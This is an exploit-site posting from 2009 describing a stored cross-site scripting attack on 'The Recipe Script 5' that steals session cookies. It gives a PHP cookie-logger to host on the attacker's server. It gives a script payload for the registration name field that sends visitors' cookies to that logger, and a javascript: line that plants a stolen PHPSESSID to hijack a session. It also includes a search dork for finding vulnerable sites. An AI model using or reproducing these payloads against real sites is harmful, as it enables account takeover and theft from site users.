[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : The Recipe Script 5 Remote XSS Vulnerability
# Published : 2009-06-15
# Author : ThE g0bL!N
# Previous Title : phportal v1 (topicler.php id) Remote SQL Injection Vulnerability
# Next Title : Joomla Component com_jumi (fileid) Blind SQL Injection Exploit
#################################################################################################################
[+] The Recipe Script version 5 Cookie Grabber Exploit
[+] Discovered By ThE g0bL!N
[+] Greetz : All my friends-Sec-r1z.com ( A good site if you want to learn :) )
[+] Vendor:http://recipescript.com/
[+] Dork"script by RECIPE SCRIPT"
#################################################################################################################
PoC
--
[+] Make 2 files and upload to your host :
[+]cookie.php - > Put in this File That Code:
<?php
$cookie = $_GET['cookie'];
$log = fopen("log.txt", "a");
fwrite($log, $cookie ."n");
fclose($log);
?>
[+]log.txt - > CHMOD it 777 and put in the same directory with cookie.php
[+]Exploit:
-------
1)First Register in the site In Fisrt Name: Put That code
2) <script>document.location ="http://localhost/[path]/cookie.php?cookie=" + document.cookie;</script>
3)Then After Complete Registration Go to add_recipe.php To add recipe
4)Add a normal Recipe
5) The Victim Open page of recipes recipes.php
6)The js code Worked
Example
-------
Result:
------
PHPSESSID:aafaa0f2cad7431d5cec1431e5bafb03
Then we put that code
javascript:document.cookie="PHPSESSID=aafaa0f2cad7431d5cec1431e5bafb03;path=/";
After That you see :
ThE g0bL!N
Profile
Log off
################################################################################################################
# www.Syue.com [2009-06-15]